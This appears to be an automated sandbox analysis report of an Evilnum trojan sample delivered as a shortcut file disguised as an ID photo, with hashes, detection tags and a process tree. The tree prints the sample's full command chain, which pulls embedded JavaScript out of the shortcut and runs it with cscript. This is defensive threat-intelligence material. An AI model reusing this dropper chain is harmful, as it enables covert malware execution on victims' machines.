evilnum | 61439535f175a654bf6e5dd26304cadb347918e2a1fa81ad72aba363f9600730

Analysis

Target

61439535f175a654bf6e5dd26304cadb347918e2a1fa81ad72aba363f9600730.lnk
Size

940KB
MD5

40d64f88071b43abaf29687a1f1ed882
SHA1

f0db18e0fd8c376a7ef7316c413240857f37ccaa
SHA256

61439535f175a654bf6e5dd26304cadb347918e2a1fa81ad72aba363f9600730
SHA512

a9974a8c3d3b75fe1ad29b9b3dbe4ffe192fdced10178b58fc964b4e2a862686964a3c97ed14684fdd0201b0473a6a46703e1c8efb162a36521f2d2537b39883

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 1524	2008	cmd.exe	28
PID 2008 wrote to memory of 1524	2008	cmd.exe	28
PID 2008 wrote to memory of 1524	2008	cmd.exe	28
PID 1524 wrote to memory of 1732	1524	cmd.exe	29
PID 1524 wrote to memory of 1732	1524	cmd.exe	29
PID 1524 wrote to memory of 1732	1524	cmd.exe	29
PID 1524 wrote to memory of 1736	1524	cmd.exe	30
PID 1524 wrote to memory of 1736	1524	cmd.exe	30
PID 1524 wrote to memory of 1736	1524	cmd.exe	30
PID 1524 wrote to memory of 1596	1524	cmd.exe	31
PID 1524 wrote to memory of 1596	1524	cmd.exe	31
PID 1524 wrote to memory of 1596	1524	cmd.exe	31
PID 1524 wrote to memory of 1680	1524	cmd.exe	32
PID 1524 wrote to memory of 1680	1524	cmd.exe	32
PID 1524 wrote to memory of 1680	1524	cmd.exe	32
PID 1524 wrote to memory of 1480	1524	cmd.exe	33
PID 1524 wrote to memory of 1480	1524	cmd.exe	33
PID 1524 wrote to memory of 1480	1524	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\61439535f175a654bf6e5dd26304cadb347918e2a1fa81ad72aba363f9600730.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "dolisznyj_id_front.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "doli*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "BC7D">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "doli*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1736
- - C:\Windows\system32\find.exe
    find "BC7D"
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1680
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1480

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2008-54-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download